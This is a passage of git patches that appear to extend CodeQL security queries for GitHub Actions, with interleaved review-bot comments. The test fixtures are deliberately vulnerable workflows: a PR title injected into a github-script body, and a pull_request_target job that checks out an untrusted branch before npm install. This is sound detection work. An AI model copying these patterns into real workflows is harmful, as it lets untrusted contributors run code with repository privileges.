${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | | .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | 
@@ -312,26 +210,20 @@ cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | 
@@ -346,14 +238,11 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | 
@@ -385,36 +274,6 @@ dfNodes | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -exprNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: 
simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index bf52da395fe..8cf97d58ab0 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,3 @@ -import codeql.actions.ast.internal.Yaml import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow 
@@ -7,28 +6,32 @@ import codeql.actions.dataflow.ExternalFlow query predicate files(File f) { any() } -query predicate yamlNodes(YamlNode n) { any() } +query predicate workflows(Workflow w) { any() } -query predicate jobNodes(Job s) { any() } +query predicate reusableWorkflows(ReusableWorkflow w) { any() } -query predicate stepNodes(Step s) { any() } +query predicate compositeActions(CompositeAction w) { any() } -query predicate runNodes(Run s) { any() } +query predicate jobs(Job s) { any() } -query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() } +query predicate localJobs(LocalJob s) { any() } -query predicate allUsesNodes(Uses s) { any() } +query predicate extJobs(ExternalJob s) { any() } -query predicate stepUsesNodes(UsesStep s) { any() } +query predicate steps(Step s) { any() } -query predicate jobUsesNodes(UsesStep s) { any() } +query predicate runSteps(Run run, string body) { run.getScript() = body } -query predicate usesSteps(Uses call, string argname, AstNode arg) { +query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } + +query predicate uses(Uses s) { any() } + +query predicate stepUses(UsesStep s) { any() } + +query predicate usesArgs(Uses call, string argname, Expression arg) { call.getArgumentExpr(argname) = arg } -query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } - query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } @@ -37,8 +40,6 @@ query predicate cfgNodes(Cfg::Node n) { any() } query predicate dfNodes(DataFlow::Node e) { any() } -query predicate exprNodes(DataFlow::Node e) { any() } - query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } query predicate usesIds(UsesStep s, string a) { s.getId() = a } From 0b71d0240743a84888b6bb3fffa47feb51f8d2ec Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 13:49:50 +0100 Subject: [PATCH 0090/1267] fix: clean debug lefovers --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 34 ------ .../codeql/actions/dataflow/FlowSources.qll | 1 + .../dataflow/internal/DataFlowPrivate.qll | 2 - .../CWE-094/CriticalExpressionInjection.ql | 12 +-- .../CWE-094/.github/workflows/changelog.yml | 100 ++++++++++++++++++ .../.github/workflows/changelog_required.yml | 9 ++ 7 files changed, 116 insertions(+), 43 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2bfedd623f5..3123518d369 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -121,7 +121,6 @@ class Outputs extends AstNode instanceof OutputsImpl { Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - // TODO: REMOVE override string toString() { result = "Job outputs node" } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 63b25229a58..028f2280680 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -252,11 +252,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = this.getInputs() or - // result = this.getOutputs() or - // result = this.getRuns() - // } override AstNodeImpl getParentNode() { none() } override string getAPrimaryQlClass() { result = "CompositeActionImpl" } 
@@ -292,12 +287,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = this.getAJob() or - // result = this.getStrategy() or - // result = this.getEnv() or - // result = this.getPermissions() - // } override AstNodeImpl getParentNode() { none() } override string getAPrimaryQlClass() { result = "WorkflowImpl" } @@ -306,8 +295,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override YamlMapping getNode() { result = n } - // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } /** Gets the 'global' `env` mapping in this workflow. */ EnvImpl getEnv() { result.getNode() = n.lookup("env") } @@ -346,11 +333,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = super.getAChildNode() or - // result = this.getInputs() or - // result = this.getOutputs() - // } OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } @@ -378,7 +360,6 @@ class RunsImpl extends AstNodeImpl, TRunsNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override AstNodeImpl getAChildNode() { result = this.getAStep() } override CompositeActionImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "RunsImpl" } 
@@ -450,7 +431,6 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() } override AstNodeImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "OutputsImpl" } @@ -503,7 +483,6 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override ExpressionImpl getAChildNode() { result = this.getAMatrixVarExpr() } override AstNodeImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "StrategyImpl" } @@ -557,10 +536,8 @@ class JobImpl extends AstNodeImpl, TJobNode { workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n } - // TODO: REMOVE override string toString() { result = "Job: " + jobId } - //override string toString() { result = n.toString() } override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override WorkflowImpl getParentNode() { result.getAChildNode() = this } @@ -739,7 +716,6 @@ class UsesStepImpl extends StepImpl, UsesImpl { result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) } - // TODO: REMOVE override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } @@ -760,7 +736,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl { ExternalJobImpl() { n.lookup("uses") = u } - //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override string getCallee() { if u.getValue().matches("./%") then result = u.getValue().regexpCapture(pathUsesParser(), 1) 
@@ -796,7 +771,6 @@ class RunImpl extends StepImpl { ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } - // TODO: REMOVE override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } @@ -807,14 +781,6 @@ class RunImpl extends StepImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class ContextExpressionImpl extends ExpressionImpl { - // TODO: REMOVE - // ContextExpressionImpl() { - // expression - // .regexpMatch([ - // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - // matrixCtxRegex() - // ]) - // } abstract string getFieldName(); abstract AstNodeImpl getTarget(); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 32d37efdaae..23ae225e07e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -96,6 +96,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 52c2ae6a483..bda55da5c82 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
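Review bot: The pattern added for `github.event.workflow.path` in `isExternalUserControlledWorkflowRun` is the only entry that reads from `workflow` rather than `workflow_run`, and nothing in the hunk says why that field counts as externally controlled, so it reads like a typo. A one-line comment above the entry stating which payload field it models and why it is attacker-influenced would settle that; the wording needs to come from the author, since the hunk does not show the reasoning. The new source arrives in a commit titled as debug clean-up, and neither fixture added in this commit references `github.event.workflow.path`, so a test case that pins it would be worth adding. The predicate's body starts and ends outside the hunk.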
@@ -72,7 +72,6 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a textual representation of this element. */ string toString() { result = super.toString() } - //Location getLocation() { result = super.getLocation() } string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } @@ -84,7 +83,6 @@ class DataFlowCall instanceof Cfg::Node { class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } - //Location getLocation() { result = super.getLocation() } string getName() { if this instanceof ReusableWorkflow then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index fd4f03e1edd..66a055634c7 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -34,14 +34,14 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph -from MyFlow::PathNode source, MyFlow::PathNode sink +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w where MyFlow::flowPath(source, sink) and - source - .getNode() - .asExpr() - .getEnclosingWorkflow() - .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml new file mode 100644 index 00000000000..0ee850f183d --- /dev/null 
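Review bot: With the new `w instanceof ReusableWorkflow` disjunct in the `where` clause, a flow inside a reusable workflow is reported without consulting any trigger, yet the alert text still says the value "may be controlled by an external user". Whether that holds depends on the events of the calling workflows, which this clause does not resolve, so the query can now report reusable workflows that are only reachable from callers with trusted triggers. If the over-approximation is intended, a comment above the disjunct such as `// reusable workflows run under the caller's trigger, which is not resolved here` would make it explicit. The diffstat of this commit lists the two new fixtures (`changelog.yml`, `changelog_required.yml`) but no `.expected` file, so the new behaviour is not pinned by this commit.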
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml 
@@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, 
insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml new file mode 100644 index 00000000000..b0a1ea5ed68 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml @@ -0,0 +1,9 @@ +name: '📋' + +on: + pull_request: + branches: [master] + +jobs: + changelog: + uses: ./.github/workflows/changelog.yml From 1bf2431c992f2c45ba9d23b7c970fb271083ab34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 15:41:57 +0100 Subject: [PATCH 0091/1267] Improve UntrustedCheckout query Account for more events, more triggers and heuristics to detect git checkouts --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 87 ++++++++++++------- .../CWE-829/.github/workflows/gitcheckout.yml | 23 +++++ 2 files changed, 81 insertions(+), 29 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 865169b3cd9..0b3a2873d51 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
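Review bot: The new `changelog.yml` fixture carries no marker for which expressions the query is expected to report, so a reader has to reconstruct the intended source-to-sink path from the results file. The interesting path is indirect: `log` and `prev_log` are built from the pull request title in the step's `env`, and then reach the `script:` body through `${{ env.log }}` and `${{ env.prev_log }}`. A short comment at those two places, for example `# source: PR title stored in env` and `# sink: env value interpolated into script`, would document what the test is meant to prove and make regressions in env tracking easier to diagnose.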
@@ -15,39 +15,68 @@ import actions -/** - * An If node that contains an `actor` check - */ -class ActorCheck extends If { - ActorCheck() { +/** An If node that contains an actor, user or label check */ +class ControlCheck extends If { + ControlCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") - } -} - -/** - * An If node that contains a `label` check - */ -class LabelCheck extends If { - LabelCheck() { + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") } } -from Workflow w, LocalJob job, UsesStep checkoutStep +bindingset[s] +predicate containsHeadRef(string s) { + s.matches("%" + + [ + "github.event.number", // The pull request number. + "github.event.pull_request.head.ref", // The ref name of head. + "github.event.pull_request.head.sha", // The commit SHA of head. + "github.event.pull_request.id", // The pull request ID. + "github.event.pull_request.number", // The pull request number. + "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. + "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. + "github.event.workflow_run.head_branch", // The branch of the head commit. + "github.event.workflow_run.head_commit.id", // The SHA of the head commit. + "github.event.workflow_run.head_sha", // The SHA of the head commit. 
+ "env.GITHUB_HEAD_REF", + ] + "%") +} + +/** Checkout of a Pull Request HEAD ref */ +abstract class PRHeadCheckoutStep extends Step { } + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { + ActionsCheckout() { + this.getCallee() = "actions/checkout" and + containsHeadRef(this.getArgumentExpr("ref").getExpression()) + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitCheckout extends PRHeadCheckoutStep instanceof Run { + GitCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*git\\s+fetch.*") and + ( + containsHeadRef(line) + or + exists(string varname | + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and + line.matches("%" + varname + "%") + ) + ) + ) + } +} + +from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent("pull_request_target") and - w.getAJob() = job and - job.getAStep() = checkoutStep and - checkoutStep.getCallee() = "actions/checkout" and - checkoutStep - .getArgumentExpr("ref") - .getExpression() - .matches([ - "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", - "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" - ]) and - not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and - not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check) -select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." + w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and + w.getAJob().(LocalJob).getAStep() = checkout and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." 
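Review bot: `GitCheckout` only considers script lines matching `git\s+fetch`, so a run step that brings the pull request head into the workspace with `git checkout`, `git pull` or `gh pr checkout` is not modelled and the query stays silent on it. Widening the line test, e.g. `line.regexpMatch(".*(git\\s+(fetch|pull|checkout)|gh\\s+pr\\s+checkout).*")`, would close that detection gap. Separately, `line.matches("%" + varname + "%")` treats `_` in the variable name as a single-character wildcard and accepts the name anywhere in the line, so a name like `HEAD_BRANCH` also matches unrelated text; a regex anchored on `$` plus the escaped name would be tighter. `ControlCheck` accepts any `if` that merely mentions the actor, user login or a label, including negated comparisons, which deserves a caveat in its QLDoc because it suppresses the alert.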
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml
new file mode 100644
index 00000000000..ab121239c6e
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml
@@ -0,0 +1,23 @@
+on:
+ pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ # 1. Check out the content from an incoming pull request
+ - run: |
+ git fetch origin $HEAD_BRANCH
+ git checkout origin/master
+ git config user.name "release-hash-check"
+ git config user.email "<>"
+ git merge --no-commit --no-edit origin/$HEAD_BRANCH
+ env:
+ HEAD_BRANCH: ${{ github.head_ref }}
+ - uses: actions/setup-node@v1
+ # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as
+ # the build scripts and referenced packages are controlled by the author of the pull request
+ - run: |
+ npm install
+ npm build
From 839d16cde563efe235bca401d6959e97a1bdaf47 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 13 Mar 2024 18:41:17 +0100
Subject: [PATCH 0092/1267] Treat If's values as expression no matter the delimiters
---
ql/lib/codeql/actions/Ast.qll | 12 ++
ql/lib/codeql/actions/ast/internal/Ast.qll | 20 ++-
ql/src/Security/CWE-829/UntrustedCheckout.ql | 39 ++---
ql/test/library-tests/test.expected | 7 +-
ql/test/library-tests/test.ql | 10 ++
.../CriticalExpressionInjection.expected | 4 +
.../CWE-094/ExpressionInjection.expected | 4 +
.../CWE-829/.github/workflows/auto_ci.yml | 135 ++++++++++++++++++
.../CWE-829/UnpinnedActionsTag.expected | 3 +
.../CWE-829/UntrustedCheckout.expected | 5 +-
10 files changed, 215 insertions(+), 24 deletions(-)
create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 3123518d369..271182a05dd 100644
--- a/ql/lib/codeql/actions/Ast.qll
